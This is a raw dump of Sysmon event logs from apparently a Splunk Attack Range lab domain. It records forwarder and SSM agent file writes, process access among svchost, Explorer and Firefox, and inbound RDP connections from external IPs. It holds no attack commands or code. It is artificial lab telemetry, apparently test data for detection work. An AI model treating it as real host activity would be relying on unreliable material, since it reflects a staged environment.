09:00:02.621{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-51182-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976225Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:05.451{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CD2ED0A2A56A4ED02A750DB34F64EDDF,SHA256=8DAB2CDF8FD69CC2607BE20A1E0D5FB7FC7CD490A2B65A14D349BC4FC866211E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976224Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:05.248{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A7D0FF843051231D6B6957941174D21F,SHA256=ABB8966450156969E972494F2FE14CB802F3A843C35629C0FBEB2B66BE0E6E4C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047709Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:06.755{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=284B145172A43815F71B5968AB1A832F,SHA256=DA0C10C8FA44A08F30034C04901BC7E374F30C05A40223A4510424A20C50B29A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976228Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:06.763{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=34D6EBBA02459F5B1118DDA3420494CF,SHA256=B6FA79AB8972DF0DA12F7BF76498263E722EB9EF77DF5D9E81FE974898787016,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976227Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:06.249{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E3BA074A58F27B8448034CA59140FA0C,SHA256=7F1F6975C346E14DA773CDE1130053C7CBABCA9CE83DA0809130F23B3D050CF8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047710Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:07.773{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4672179EAE0BE99DCBB5DD294A0DA0E,SHA256=2EF70581AF76EB05E3BA10C6490D3791AAB90523AEE493DA31C14F52B740F03A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000976232Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:07.685{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976231Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:07.685{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000976230Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:07.685{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1500-00000000FD01}1172C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000976229Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:07.263{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AB198234CEDA2BA44DF9569FC7D407A,SHA256=79207F0338EEFCCDD5575E9E5B72DA442CEA26FA62349008246A87A06BC521FD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047711Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:08.853{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B9F917811010B78B436B9DE8AFC6165D,SHA256=3CDF342B852F0500689221F1C5D66B7345800B266F1F5886A4941EDE8211466F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976236Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:08.388{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E2DF407C56263A50E46BF1ED8AFE7DB6,SHA256=46688173A963803EABDB3C2F41117C7EC89AEE36A220252453412775D278997E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976235Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:08.263{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14DB5E19BC41FDFCED35322A88517CDA,SHA256=17EAC49C1D93E4B6E7858AAB485698BE788B8ED17A71B0440CAD9F82E225691A,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976234Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:05.037{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-52664-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976233Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:04.291{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse162.55.235.26static.26.235.55.162.clients.your-server.de62183-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001047712Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:09.870{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FEA818101FA3AE565AD951AEAB47DB5,SHA256=5BB4EFA219D105AAEDC487B3991431BD59C91B5AF5EDB6E249A6D6204E6618D5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976239Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:06.544{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-9638-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000976238Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:06.375{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.231-54846-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976237Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:09.279{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=14EA355ECAF63468BB43EE6DD7216BA1,SHA256=850CA62D520B90C0E0FD977F0AFC3600754427597E593B6BE43C712454CD02AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047713Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:10.889{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=580AD0620C6BB08C6214209B44A029B7,SHA256=F93130981C7F252963C0D87998F67E17D8E51DBFD4D93E620741E0E6AAC51DA5,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976241Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:07.829{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59244-false10.0.1.12-8000- 23542300x8000000000000000976240Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:10.279{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=342A9E6A8E70C106F7311C235DB059BA,SHA256=7D8CD99956F273C7518E8E52BB7F39A10F7EEE4EBBB1E8282721DC65DDF0CC3E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047715Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:11.935{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A36B4EAD08756F620DD67137C293AFEC,SHA256=FFB166C8D991C63518086366E9EA4E2ADF0ED1270DCF663A24DEBA233C1FC192,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976244Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:08.536{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-54926-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x8000000000000000976243Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:11.654{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA23B3362C68561B31B5E69F56ACFFE7,SHA256=D93456AB46D0F668ACE936C9A30DD566110ABDBBA47DDC5C6D6CCA0608F29609,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976242Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:11.497{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F73136C97577DDD5CFBF1482B834E6F3,SHA256=E5B250637D3CADEA24346749AF71EC23526FAD811728E8F6D010CEC08DA2DE63,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047714Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:08.814{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49203-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001047717Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:12.949{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7DC4878B255BA9998E4E4B3ACF862659,SHA256=6F2EDE2F65979104D2D7D1FF5B8CF334188DD805D801BC1C7B44C992E82BB05D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976245Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:12.497{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0D362A6E0AD626CCFCA46252F28D6DE1,SHA256=AE1E14DE053E0EFDD64A081CBBA2DE6DA1462FDEE8773C2B1163A0D2D787469F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001047716Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:12.834{5EBD8912-7B3A-6151-3A78-00000000FC01}71203376C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x8000000000000000976247Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:13.732{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED904A7D23289D408294F72C53929E9A,SHA256=0FBD07D970362D6128BFB8420F6F269AC01AB4D53A8E46153F0B9AE4BAC3921E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047718Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:13.869{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\respondent-20210924073323-4296MD5=3A908804D0573FF7380F514264884FB3,SHA256=C81D2F048F52EDBC4290754297EEBE81A82636336939823758E35E4C6AD1E005,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976246Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:13.435{69CF5F33-7F29-614D-1D00-00000000FD01}1960NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=72F9D15A308A3AFACD92589D17F2C03E,SHA256=E0EA3012FF17D797A034C0E7F787325C50EBFE6C56FB1128CC9B4A2A94A03D83,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976248Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:14.951{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D97C9294DEDE15BF7AD7C327CB49E5A,SHA256=6D5EDB1E94D7B888365DE3A3B0F8EC4880A452FF2B1122C96BEC332B1C685B6E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047720Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:14.888{5EBD8912-7F40-614D-2C00-00000000FC01}3028NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0fd64d26ae25a9a58\channels\health\surveyor-20210924073320-4297MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047719Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:14.019{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9696D08BDABE6540328AB31F2CEF7459,SHA256=EE305A5A3E25BB0D858253548748DE6B4ECDD19FFC3BE4913141F255EEE8F24D,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000976250Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:12.064{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59245-false10.0.1.12-8089- 354300x8000000000000000976249Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:11.615{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse185.202.2.131-39241-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 23542300x80000000000000001047721Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:15.034{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B5ABCEB32B87DC2F737974F3260C82BB,SHA256=A469A0733DCDDD27D42940C4F3A7D9CE82255BCA4D6A985B71088BE3A07B7925,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976253Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:16.810{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3FB307796755AC51AB61EC79A665E89,SHA256=1E5AAD23022D2B367B3E9A36F04D07238B95A72D59403E0B32D4BFA6BAABC906,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976252Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:16.810{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=67F2A6B58522C9A1D697F0FCC117BAA8,SHA256=081784FDE2FF23BF60639EDF86C51632AAEA21A4FA61C4F68212FB7826832DA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000976251Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:00:16.169{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1E6B64FCDA1045CEE644DAFBA63DB89,SHA256=684639BE8AF496C69D4F3A4006C8730FACE490E7A3B5C3FE2CED05BDEBCEDA63,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001047726Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:14.725{5EBD8912-7F4C-614D-6E00-00000000FC01}3728C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-429.attackrange.local49204-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001047725Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:16.548{5EBD8912-79C0-6151-E577-00000000FC01}42962240C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+6497|C:\Windows\System32\SHCORE.dll+6387|C:\Windows\System32\SHCORE.dll+62fd|C:\Windows\System32\SHCORE.dll+620a|C:\Windows\System32\SHELL32.dll+55a10|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801B4AE68A8)|UNKNOWN(FFFFAF68570A5B48)|UNKNOWN(FFFFAF68570A5CC7)|UNKNOWN(FFFFAF68570A0351)|UNKNOWN(FFFFAF68570A1D1A)|UNKNOWN(FFFFAF685709FFD6)|UNKNOWN(FFFFF801B47FE103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad 10341000x80000000000000001047724Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:16.548{5EBD8912-79C0-6151-E577-00000000FC01}42962240C:\Windows\Explorer.EXE{5EBD8912-7B3A-6151-3A78-00000000FC01}7120C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHCORE.dll+64c8|C:\Windows\System32\SHCORE.dll+1c0e5|C:\Windows\System32\SHELL32.dll+554f1|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9814|UNKNOWN(FFFFF801B4AE68A8)|UNKNOWN(FFFFAF68570A5B48)|UNKNOWN(FFFFAF68570A5CC7)|UNKNOWN(FFFFAF68570A0351)|UNKNOWN(FFFFAF68570A1D1A)|UNKNOWN(FFFFAF685709FFD6)|UNKNOWN(FFFFF801B47FE103)|C:\Windows\System32\win32u.dll+10c4|C:\Windows\System32\USER32.dll+1ea2e|C:\Windows\System32\SHELL32.dll+5927b|C:\Windows\System32\SHELL32.dll+dac2a|C:\Windows\System32\SHCORE.dll+33fad|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001047723Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:16.548{5EBD8912-7B3A-6151-3A78-00000000FC01}7120ATTACKRANGE\AdministratorC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6824f4a902c78fbd.customDestinations-ms~RFfc3a0f8.TMPMD5=DE3A0FA109221B18DF49AC1FFC6FE4B1,SHA256=ED397D4D656C29DB004817AED882B128D4456823F423CD84E3D3C39C431C5AC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001047722Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:00:16.049{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2E06E5CAF9A59FA624A4E5DEBBB4B3F7,SHA256=4BED7A7B0785F57FCAA0FD8D6C8EDD1E5B926D9897C81A429AA6A270A1D68EC0,IMPHASH=00000000000000000000000000000000falsetrue 